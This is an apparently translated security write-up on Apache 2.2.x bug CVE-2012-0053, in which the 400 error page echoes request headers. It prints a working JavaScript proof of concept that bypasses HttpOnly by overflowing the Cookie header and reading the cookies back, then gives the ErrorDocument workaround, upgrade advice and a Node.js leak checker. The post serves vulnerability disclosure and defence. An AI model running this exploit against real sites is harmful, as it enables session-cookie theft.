Many applications, including commercial and mature open-source CMS article systems, set the HttpOnly attribute on their cookies to stop XSS from stealing user cookies: the browser refuses to expose such cookies to JavaScript, so an XSS bug does less damage. The issue described here, an Apache httpd 2.2.x bug (fixed in 2.2.22, CVE-2012-0053) in which the 400 Bad Request error page echoes the offending request headers, Cookie header included, back into the response body, can be used to get around HttpOnly: a script that cannot read document.cookie can still provoke the error and read the cookies out of the response.

Open a site served by a vulnerable Apache in Chrome, press F12 to open the developer tools, switch to the Console, paste the following code and press Enter:

// http://www.exploit-db.com/exploits/18442/
// Ten cookies of 819 bytes each push the Cookie header to roughly 8.2 KB, past
// Apache's default LimitRequestFieldSize of 8190 bytes, so the server answers 400
// and (on unpatched 2.2.x) echoes the whole header in the error body.
function setCookies(good) {
    // Construct string for cookie value
    var str = "";
    for (var i = 0; i < 819; i++) {
        str += "x";
    }
    // Set cookies
    for (i = 0; i < 10; i++) {
        var cookie;
        if (good) {
            // Expire evil cookie (clean up once the response has been read)
            cookie = "xss" + i + "=;expires=" + new Date(+new Date() - 1).toUTCString() + "; path=/;";
        } else {
            // Set evil cookie (padding that overflows the header limit)
            cookie = "xss" + i + "=" + str + ";path=/";
        }
        document.cookie = cookie;
    }
}

function makeRequest() {
    setCookies();

    function parseCookies() {
        var cookie_dict = {};
        // Only react on 400 status
        if (xhr.readyState === 4 && xhr.status === 400) {
            // Replace newlines and match <pre> content, where Apache echoes the offending header
            var content = xhr.responseText.replace(/\r|\n/g, '').match(/<pre>(.+)<\/pre>/);
            if (content && content.length) {
                // Remove Cookie: prefix
                content = content[1].replace("Cookie: ", "");
                // Drop our padding cookies and keep the real ones, HttpOnly or not
                var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
                // Add cookies to object
                for (var i = 0; i < cookies.length; i++) {
                    var s_c = cookies[i].split('=', 2);
                    cookie_dict[s_c[0]] = s_c[1];
                }
            }
            // Unset malicious cookies
            setCookies(true);
            alert(JSON.stringify(cookie_dict));
        }
    }

    // Make XHR request
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = parseCookies;
    xhr.open("GET", "/", true);
    xhr.send(null);
}

makeRequest();

You will see a glorious 400 error whose body contains the cookie information, and the script alerts the recovered cookies as JSON.

Download: https://gist.github.com/pilate/1955a1c28324d4724b7b/download

Fix:

Apache officially offers four ways of handling errors (http://httpd.apache.org/docs/2.0/mod/core.html#errordocument):

In the event of a problem or error, Apache can be configured to do one of four things,

1. output a simple hardcoded error message
2. output a customized message
3. redirect to a local URL-path to handle the problem/error
4. redirect to an external URL to handle the problem/error

In testing, only method 2 works for the 400 error: with a custom message configured, the response no longer contains the cookie contents.

Apache configuration:

ErrorDocument 400 "security test"

Of course, upgrading Apache to the latest version (the bug is fixed in 2.2.22) also works :). The ErrorDocument override only stops the headers from being echoed; treat it as a stopgap until the upgrade is done.

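To make the parsing step of the PoC concrete, and to give a check that can be run against a server's 400 page before and after the ErrorDocument change, here is an added example (my code, not part of the original post or of pilate's PoC) that runs under Node.js. It extracts the echoed Cookie header from a 400 body the way the PoC does, drops the padding cookies, and reports whether a given 400 response still leaks the header. Both response bodies are constructed for the example: one in the shape of the Apache 2.2 400 page, the other the plain text that `ErrorDocument 400 "security test"` produces. PHPSESSID and lang are placeholder cookie names, and the 8190-byte LimitRequestFieldSize default is quoted as background.

```javascript
// Added example, not code from the original post or from the exploit-db PoC.
// Parses an Apache 2.2-style "400 Bad Request" body and recovers the cookies
// the server echoed, the same extraction the PoC does in parseCookies().

// Padding cookies sent by the PoC: xss0..xss9, each a run of 819 "x" bytes.
// Ten of them make the Cookie header ~8.2 KB, over Apache's default
// LimitRequestFieldSize of 8190 bytes (default quoted here as background).
const PADDING_COOKIE = /^xss\d+=x+$/;

// Recover the echoed Cookie header from a 400 error body.
// Returns { name: value } for the real cookies, or null when the body echoes
// no Cookie header (what a patched server or an ErrorDocument override gives).
function extractCookiesFrom400(body) {
  // Collapse newlines so the multi-line <pre> block matches, as the PoC does.
  const m = body.replace(/\r|\n/g, '').match(/<pre>(.+?)<\/pre>/);
  if (!m) return null;
  const inner = m[1];
  const idx = inner.indexOf('Cookie: ');
  if (idx === -1) return null;
  const header = inner.slice(idx + 'Cookie: '.length);
  const cookies = {};
  for (const part of header.split(';')) {
    const pair = part.trim();
    if (!pair || PADDING_COOKIE.test(pair)) continue; // skip the padding we sent
    const eq = pair.indexOf('=');
    const name = eq === -1 ? pair : pair.slice(0, eq);
    const value = eq === -1 ? '' : pair.slice(eq + 1);
    cookies[name] = value;
  }
  return cookies;
}

// A server is still exposed when its 400 body echoes at least one real cookie.
function leaksCookieHeader(body) {
  const cookies = extractCookiesFrom400(body);
  return cookies !== null && Object.keys(cookies).length > 0;
}

// Constructed sample: the shape of the 400 page an unpatched Apache 2.2.x
// returned when the Cookie header exceeded the limit. PHPSESSID stands in for
// an HttpOnly session cookie; xss0..xss9 are the PoC's padding cookies.
const padding = Array.from({ length: 10 }, (_, i) => `xss${i}=${'x'.repeat(819)}`).join('; ');
const VULNERABLE_400_BODY = [
  '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">',
  '<html><head>',
  '<title>400 Bad Request</title>',
  '</head><body>',
  '<h1>Bad Request</h1>',
  '<p>Your browser sent a request that this server could not understand.<br />',
  'Size of a request header field exceeds server limit.<br />',
  '<pre>',
  `Cookie: PHPSESSID=0123456789abcdef; lang=en; ${padding}`,
  '</pre>',
  '</p>',
  '</body></html>',
].join('\n');

// Constructed sample: the body served after `ErrorDocument 400 "security test"`.
const FIXED_400_BODY = 'security test';

// Run both bodies through the check so the difference is visible.
function demo() {
  return {
    vulnerable: { leaks: leaksCookieHeader(VULNERABLE_400_BODY), cookies: extractCookiesFrom400(VULNERABLE_400_BODY) },
    fixed: { leaks: leaksCookieHeader(FIXED_400_BODY), cookies: extractCookiesFrom400(FIXED_400_BODY) },
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The padding filter is what turns the echoed header into something useful: without it the dump is dominated by the ten xss cookies the script itself planted. Swapping `VULNERABLE_400_BODY` for the real body of a 400 response captured from a server (for instance with the PoC's XHR, or curl with an oversized Cookie header) turns `leaksCookieHeader` into a quick before-and-after check for the ErrorDocument workaround.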
Reference: http://httpd.apache.org/security/vulnerabilities_22.html